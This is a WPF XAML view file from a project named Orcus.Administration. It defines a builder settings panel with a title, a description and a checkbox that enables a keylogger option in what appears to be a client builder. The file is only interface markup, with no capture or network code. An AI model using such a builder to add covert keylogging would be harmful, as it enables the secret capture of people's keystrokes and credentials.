Orcus.Administration/Views/BuilderViews/KeyloggerBuilderPropertyView.xaml

<buildPlugin:BuilderPropertyViewUserControl x:Class="Orcus.Administration.Views.BuilderViews.KeyloggerBuilderPropertyView"
                                            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                                            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                                            xmlns:buildPlugin="clr-namespace:Orcus.Administration.Plugins.BuildPlugin;assembly=Orcus.Administration.Plugins"
                                            xmlns:builderSettings="clr-namespace:Orcus.Shared.Settings;assembly=Orcus.Shared"
                                            xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
                                            xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
                                            d:DataContext="{d:DesignInstance builderSettings:KeyloggerBuilderProperty}"
                                            d:DesignHeight="300"
                                            d:DesignWidth="300"
                                            x:TypeArguments="builderSettings:KeyloggerBuilderProperty"
                                            mc:Ignorable="d">
    <StackPanel>
        <TextBlock FontWeight="Bold" Text="{StaticResource Keylogger}" />
        <TextBlock Margin="0,2,0,0"
                   Text="{StaticResource KeyloggerDescription}"
                   TextWrapping="Wrap" />
        <CheckBox Margin="0,10,0,0"
                  Content="{StaticResource Enable}"
                  IsChecked="{Binding IsEnabled}" />
    </StackPanel>
</buildPlugin:BuilderPropertyViewUserControl>